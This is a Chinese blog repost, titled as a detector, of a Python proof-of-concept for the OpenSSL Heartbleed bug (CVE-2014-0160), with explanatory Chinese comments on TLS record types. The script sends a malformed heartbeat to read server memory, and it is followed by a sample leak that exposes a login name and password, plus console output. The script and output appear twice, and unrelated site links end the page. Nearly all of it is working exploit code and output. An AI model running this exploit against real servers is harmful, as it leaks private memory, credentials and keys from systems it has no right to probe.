OpenSSL心脏滴血检测
来源:互联网 发布:皮带腰包 淘宝 编辑:程序博客网 时间:2024/04/28 06:18
# coding=utf-8
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# ord()函数是chr()函数(对于8位的ASCII字符串)或unichr()函数(对于Unicode对象)的配对函数,它以一个字符(长度为1的字符串)作为参数,返回对应的ASCII数值
# X 表示以十六进制形式输出,02表示不足两位,前面补0输出;如果超过两位,则实际输出
# 1、select函数阻塞进程,直到inputs中的套接字被触发(在此例中,套接字接收到客户端发来的握手信号,从而变得可读,满足select函数的“可读”条件),rs返回被触发的套接字(服务器套接字);
# TLS记录协议记录头中content type表示TSL记录协议之上的上传协议类型(改变密码规范协议 告警协议 握手协议)
#心跳包类型,IANA组织把type编号定义为24(0x18)
#含有心跳扩展机制的TLS版本主要包含在TLSv1.0(0x0301),TLSv1.1(0x0302),TLSv1.2(0x0303)三种版本中
#imaps tcp-993 pop3s tcp-995 smtps tcp-465
#content type 20 改变密码规范协议
#content type 21 告警协议
#content type 22 握手协议
#content type 23 应用数据协议
#content type 24 心跳类型
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
#client hello消息构造
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
'''
16 03 02 00 dc是TSL记录协议前面5个字节,00 dc表示(压缩长度)220字节
'''
#心跳请求消息构造
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16): #xrange与range相似,只不过xrange返回的是生成器
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
#按照长度接收返回数据,并返回
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
#
def recvmsg(s):
hdr = recvall(s, 5)#recvall返回接收的数据,接收的是type,version,length字节数(1,2,2)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
#struct.unpack将字节流转变为Python类型数据,
#ln中数据是TLS记录开头的5字节之后,开始算起,
pay = recvall(s, ln, 10)#recvall返回接收的数据
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d pay= %s' % (typ, ver, len(pay),pay[0:6])
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True: #相当于把TLS中回复的数据,同一个套接字缓存冲区,分四次,每次取出一部分对应
#对应 certificate server key exchange server hello done服务器返回的消息
#我认为套接字接收缓冲区的数据recv后,就被取走,不在存在对应套接字的缓冲区里了
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
#握手
# Look for server hello done message; HelloDone表示双方达成握手协议,握手接通,
# Hellodown 4个字节0e 00 00 00
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
'''
18 03 02 40 00 02 40 00 d8 03 02 53 43 5b 90 9d …@..@….SC[..
9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc .r….+..H…9..
16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 ……w.3….f..
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f …”.!.9.8……
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 …5…………
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e …………….
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 .3.2…..E.D….
00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 ./…A……….
00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 …………….
00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 …….I……..
00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c …4.2……….
00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 …………….
00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 …………….
00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 ………#……
01 6b 87 3c 2a f7 db 30 ef 5c d2 68 0f 8b c6 10 .k.<*..0..h….
37 2e 33 36 0d 0a 41 63 63 65 70 74 3a 20 74 65 7.36..Accept: te
78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 xt/html,applicat
69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 ion/xhtml+xml,ap
70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d plication/xml;q=
30 2e 39 2c 69 6d 61 67 65 2f 77 65 62 70 2c 2a 0.9,image/webp,*
2f 2a 3b 71 3d 30 2e 38 0d 0a 52 65 66 65 72 65 /*;q=0.8..Refere
72 3a 20 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 r: https://192.1
36 38 2e 31 39 37 2e 31 32 38 2f 63 68 65 63 6b 68.197.128/check
2e 70 68 70 3f 6e 61 6d 65 3d 79 61 6f 66 65 69 .php?name=yaofei
26 70 61 73 73 77 6f 72 64 3d 31 32 33 34 35 36 &password=123456
0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin
67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
2c 20 73 64 63 68 2c 20 62 72 0d 0a 41 63 63 65 , sdch, br..Acce
70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 7a 68 2d pt-Language: zh-
43 4e 2c 7a 68 3b 71 3d 30 2e 38 0d 0a 0d 0a 9d CN,zh;q=0.8…..
47 d4 f2 b4 2e dc 63 f7 4c 28 bb 43 71 41 ca 00 G…..c.L(.CqA..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
'''
'''
D:\Desktop>python find_opensslbug.py server -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 2804
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable
D:\Desktop>python find_opensslbug.py server -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 53
... received message: type = 22, ver = 0302, length = 4760
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 21, ver = 0302, length = 2
Received alert:
0000: 02 0A ..
Server returned error, likely not vulnerable
D:\Desktop>python find_opensslbug.py server -p 443
'''
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# ord()函数是chr()函数(对于8位的ASCII字符串)或unichr()函数(对于Unicode对象)的配对函数,它以一个字符(长度为1的字符串)作为参数,返回对应的ASCII数值
# X 表示以十六进制形式输出,02表示不足两位,前面补0输出;如果超过两位,则实际输出
# 1、select函数阻塞进程,直到inputs中的套接字被触发(在此例中,套接字接收到客户端发来的握手信号,从而变得可读,满足select函数的“可读”条件),rs返回被触发的套接字(服务器套接字);
# TLS记录协议记录头中content type表示TSL记录协议之上的上传协议类型(改变密码规范协议 告警协议 握手协议)
#心跳包类型,IANA组织把type编号定义为24(0x18)
#含有心跳扩展机制的TLS版本主要包含在TLSv1.0(0x0301),TLSv1.1(0x0302),TLSv1.2(0x0303)三种版本中
#imaps tcp-993 pop3s tcp-995 smtps tcp-465
#content type 20 改变密码规范协议
#content type 21 告警协议
#content type 22 握手协议
#content type 23 应用数据协议
#content type 24 心跳类型
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
#client hello消息构造
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
'''
16 03 02 00 dc是TSL记录协议前面5个字节,00 dc表示(压缩长度)220字节
'''
#心跳请求消息构造
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16): #xrange与range相似,只不过xrange返回的是生成器
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
#按照长度接收返回数据,并返回
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
#
def recvmsg(s):
hdr = recvall(s, 5)#recvall返回接收的数据,接收的是type,version,length字节数(1,2,2)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
#struct.unpack将字节流转变为Python类型数据,
#ln中数据是TLS记录开头的5字节之后,开始算起,
pay = recvall(s, ln, 10)#recvall返回接收的数据
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d pay= %s' % (typ, ver, len(pay),pay[0:6])
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True: #相当于把TLS中回复的数据,同一个套接字缓存冲区,分四次,每次取出一部分对应
#对应 certificate server key exchange server hello done服务器返回的消息
#我认为套接字接收缓冲区的数据recv后,就被取走,不在存在对应套接字的缓冲区里了
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
#握手
# Look for server hello done message; HelloDone表示双方达成握手协议,握手接通,
# Hellodown 4个字节0e 00 00 00
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
'''
18 03 02 40 00 02 40 00 d8 03 02 53 43 5b 90 9d …@..@….SC[..
9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc .r….+..H…9..
16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 ……w.3….f..
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f …”.!.9.8……
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 …5…………
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e …………….
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 .3.2…..E.D….
00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 ./…A……….
00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 …………….
00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 …….I……..
00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c …4.2……….
00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 …………….
00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 …………….
00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 ………#……
01 6b 87 3c 2a f7 db 30 ef 5c d2 68 0f 8b c6 10 .k.<*..0..h….
37 2e 33 36 0d 0a 41 63 63 65 70 74 3a 20 74 65 7.36..Accept: te
78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 xt/html,applicat
69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 ion/xhtml+xml,ap
70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d plication/xml;q=
30 2e 39 2c 69 6d 61 67 65 2f 77 65 62 70 2c 2a 0.9,image/webp,*
2f 2a 3b 71 3d 30 2e 38 0d 0a 52 65 66 65 72 65 /*;q=0.8..Refere
72 3a 20 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 r: https://192.1
36 38 2e 31 39 37 2e 31 32 38 2f 63 68 65 63 6b 68.197.128/check
2e 70 68 70 3f 6e 61 6d 65 3d 79 61 6f 66 65 69 .php?name=yaofei
26 70 61 73 73 77 6f 72 64 3d 31 32 33 34 35 36 &password=123456
0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin
67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
2c 20 73 64 63 68 2c 20 62 72 0d 0a 41 63 63 65 , sdch, br..Acce
70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 7a 68 2d pt-Language: zh-
43 4e 2c 7a 68 3b 71 3d 30 2e 38 0d 0a 0d 0a 9d CN,zh;q=0.8…..
47 d4 f2 b4 2e dc 63 f7 4c 28 bb 43 71 41 ca 00 G…..c.L(.CqA..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
'''
'''
D:\Desktop>python find_opensslbug.py server -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 2804
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable
D:\Desktop>python find_opensslbug.py server -p 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 53
... received message: type = 22, ver = 0302, length = 4760
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 21, ver = 0302, length = 2
Received alert:
0000: 02 0A ..
Server returned error, likely not vulnerable
D:\Desktop>python find_opensslbug.py server -p 443
'''
阅读全文
0 0
- OpenSSL心脏滴血检测
- OpenSSL “心脏滴血”漏洞
- OpenSSL “心脏滴血”漏洞
- OpenSSL心脏滴血漏洞
- CVE-2014-0160浅析-OpenSSL数组越界访问(Heartbleed心脏滴血)漏洞
- 心脏滴血漏洞
- OpenSSL心脏出血漏洞
- OpenSSL“心脏出血”漏洞
- 心脏滴血漏洞简单攻击
- 关于OpenSSL“心脏出血”漏洞的分析
- 关于OpenSSL“心脏出血”漏洞的分析
- 关于OpenSSL“心脏出血”漏洞的分析
- 关于OpenSSL“心脏出血”漏洞的分析
- 关于OpenSSL“心脏出血”漏洞的分析
- 关于OpenSSL“心脏出血”漏洞的分析
- 关于OpenSSL“心脏出血”漏洞的分析
- openssl "Heartbleed"心脏流血漏洞升级方法
- OpenSSL “Heartbleed”心脏流血漏洞升级方法
- 文章标题
- 条件随机场:Conditionl Random Field
- 推荐使用Numba加速Python科学计算
- solr基础
- C++多态浅析
- OpenSSL心脏滴血检测
- Nginx 反向代理的基本配置及命令解析(以HLS为例子 )
- 剑指offer之二叉树中和为某一值的路径(Python)
- linux串口编程传送二进制数据时遇到0x0d,0x11和0x13会被丢掉问题
- Hive配置 连接远程mysql
- Linux教程【12】-关机重启命令
- http进行wifi认证的设计思路
- Android入门之环境搭建-helloworld
- Python学习笔记:python中enumerate函数的用法